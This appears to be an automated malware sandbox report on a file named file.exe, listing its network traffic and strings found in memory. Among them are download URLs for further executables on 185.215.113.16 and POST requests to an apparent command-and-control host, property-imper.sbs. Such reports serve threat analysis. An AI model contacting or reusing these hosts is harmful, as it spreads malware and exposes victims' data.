          Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
          Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
          Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
          Source: file.exe, file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215
          Source: file.exe, file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
          Source: file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe(w
          Source: file.exe, 00000000.00000002.1722892264.000000000113B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
          Source: file.exe, file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
          Source: chromecache_114.7.drString found in binary or memory: http://schema.org/Organization
          Source: file.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/certhelp
          Source: chromecache_114.7.dr, chromecache_78.7.drString found in binary or memory: https://aka.ms/feedback/report?space=61
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/msignite_docs_banner
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://aka.ms/pshelpmechoose
          Source: chromecache_114.7.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
          Source: chromecache_114.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
          Source: chromecache_114.7.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
          Source: file.exe, 00000000.00000003.1410860155.0000000005B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://channel9.msdn.com/
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
          Source: file.exe, 00000000.00000003.1410860155.0000000005B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/Thraka
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/Youssef1313
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/adegeo
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://github.com/dotnet/try
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/gewarren
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://github.com/js-cookie/js-cookie
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/mairaw
          Source: chromecache_114.7.drString found in binary or memory: https://github.com/nschonni
          Source: file.exe, 00000000.00000003.1410860155.0000000005B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
          Source: chromecache_114.7.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
          Source: file.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
          Source: file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/0914
          Source: file.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1726870849.0000000005B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
          Source: file.exe, 00000000.00000003.1435872175.000000000139A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435855496.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api6
          Source: file.exe, 00000000.00000003.1476241587.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516306485.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api=
          Source: file.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiO
          Source: file.exe, 00000000.00000003.1476241587.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432777993.000000000139D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516306485.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiY
          Source: file.exe, 00000000.00000003.1409218588.000000000139D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1409832918.000000000139D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1409489187.000000000139E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiz
          Source: file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/t
          Source: file.exe, 00000000.00000003.1364151872.000000000138C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api9
          Source: chromecache_106.7.drString found in binary or memory: https://schema.org
          Source: file.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
          Source: chromecache_106.7.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: chromecache_94.7.dr, chromecache_106.7.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
          Source: file.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
          Source: file.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
          Source: file.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
          Source: file.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000000.00000003.1410564695.0000000005CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
